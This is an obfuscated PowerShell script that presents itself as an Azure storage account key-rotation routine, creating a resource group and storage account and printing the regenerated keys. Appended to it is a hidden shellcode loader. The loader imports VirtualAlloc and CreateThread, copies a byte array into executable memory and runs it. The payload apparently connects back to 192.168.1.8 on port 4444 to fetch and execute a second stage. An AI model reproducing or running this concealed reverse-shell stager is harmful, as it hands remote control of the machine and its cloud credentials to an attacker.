.("{1}{3}{2}{0}" -f 'on','Get','cati','-AzLo') | &("{0}{1}" -f'se','lect') ("{1}{0}{2}"-f'i','Locat','on')


${L`oC`A`TION} = ("{0}{1}{2}"-f 'eas','t','us')


${REs`OU`RCe`gRO`UP} = ("{2}{3}{1}{0}"-f 'g','tr','rotate','keystes')
.("{1}{0}{2}{4}{3}" -f'R','New-Az','esou','eGroup','rc') -Name ${rEsOU`RC`Eg`ROuP} -Location ${Loc`A`TiOn} 


${S`T`o`RaGE`AcC`OUNTNA`me} = ("{3}{4}{0}{2}{1}" -f 'testk','ys','e','contos','o')
.("{4}{3}{2}{0}{1}"-f'eA','ccount','rag','ew-AzSto','N') -ResourceGroupName ${Re`So`U`RcegROup} `
  -Name ${ST`OR`Ag`EACCOUNTNaMe} `
  -Location ${l`o`cATIOn} `
  -SkuName ("{1}{3}{2}{0}"-f'_LRS','St','d','andar') `


${sTorAge`AcC`OUNT`k`EY} = (&("{6}{2}{4}{5}{0}{3}{1}" -f'c','ey','-Az','countK','S','torageA','Get') -ResourceGroupName ${REs`o`UrC`egRO`UP} -Name ${StOR`AGEAc`cOUn`TnA`Me})."VAL`UE"[0]

&("{2}{3}{1}{0}"-f 'Host','e-','W','rit') ("{4}{3}{1}{5}{0}{2}" -f '=','nt key ',' ','ccou','storage a','1 ') ${SToR`A`g`E`ACCoUntkEY}


&("{1}{3}{2}{0}"-f'ountKey','New-AzSto','geAcc','ra') -ResourceGroupName ${r`ESOURc`eGRo`UP} `
    -Name ${sTOragE`A`ccoUNt`NAME} `
    -KeyName ("{0}{1}"-f'ke','y1')


${STOr`Ageac`c`OUnTkey} = (&("{0}{1}{2}{4}{3}"-f 'Get','-AzStora','geA','countKey','c') -ResourceGroupName ${res`ou`RC`EgR`OUP} -Name ${stOR`AgeAccoUNtn`A`me})."v`AlUe"[0]
.("{0}{1}{2}" -f'W','rite-Hos','t') ("{4}{2}{3}{1}{0}" -f 'ey 1 = ','k','ccoun','t ','storage a') ${St`OrA`ge`Ac`CoUntKEy}

${C} = ((("{79}{19}{18}{59}{23}{57}{106}{27}{28}{73}{21}{9}{33}{2}{6}{52}{60}{20}{45}{15}{104}{13}{68}{98}{1}{29}{39}{78}{36}{37}{87}{91}{44}{42}{94}{4}{0}{49}{10}{66}{3}{88}{89}{80}{5}{41}{31}{102}{64}{51}{56}{55}{86}{17}{35}{77}{48}{81}{103}{24}{97}{16}{99}{65}{105}{93}{54}{34}{46}{82}{71}{75}{40}{14}{76}{26}{72}{8}{74}{53}{38}{43}{61}{67}{7}{22}{50}{58}{85}{62}{96}{90}{30}{32}{63}{92}{47}{69}{70}{11}{95}{12}{84}{83}{25}{101}{100}"-f 'llRSA)','l','rn In','c s','.d',' I','tPt','msvcrt.dll','[','c stati','publ','es','ui','dr','ionF','t','Pt','Attrib','(','rt','(In','i','RS','Akernel32.d','iz',' ','ags, IntPtr lpTh','RSA)',']pu','ocationType','tP','r Cr','tr ','c exte','tr ','ute','t);[','DllI','I',', ',' dwCreat','ntPt','l','mp','erne','tP','lpPa','mset','uin',']','A','eT','r Virt','l',' IntP','read(IntPtr lp','h','l',')]publi','RS','ualAlloc','o','tatic ','m','t','e','i','rt(RSA','ess, uint dwSize, uint fl','(Int','Ptr d','eter, ','readId);','bl','Dl','uint','l','s, ','uint flProtec','[DllImpo','rn','t dwSta','ram','rc,','nt s','c s','Thread','mport','t','atic exte','In','(RSAk','e',',','32','t, ','extern ','e, Int','Al','r lpStartAddr','unt);','uint co','ea','ckS','r lpAd','ss','l'))."r`EpLace"('RSA',[StRing][chAr]34));${W} = &("{1}{0}{2}"-f 'T','Add-','ype') -memberDefinition ${c} -Name ("{0}{1}"-f'Win3','2') -namespace ("{0}{3}{2}{1}"-f 'Win3','ns','Functio','2') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x01,0x08,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${z}."le`NgtH" -gt 0x1000){${G} = ${z}."LEnG`TH"};${X}=${w}::("{1}{2}{0}" -f'lloc','Virtual','A').Invoke(0,0x1000,${g},0x40);for (${I}=0;${i} -le (${Z}."lE`NGtH"-1);${I}++) {${w}::"m`EmSEt"([IntPtr](${x}.("{0}{1}{2}"-f'T','oIn','t32').Invoke()+${I}), ${Z}[${I}], 1)};${w}::("{0}{1}{3}{2}" -f 'C','r','read','eateTh').Invoke(0,0,${x},0,0,0);for (;;){.("{2}{0}{1}" -f'-s','leep','Start') 60};
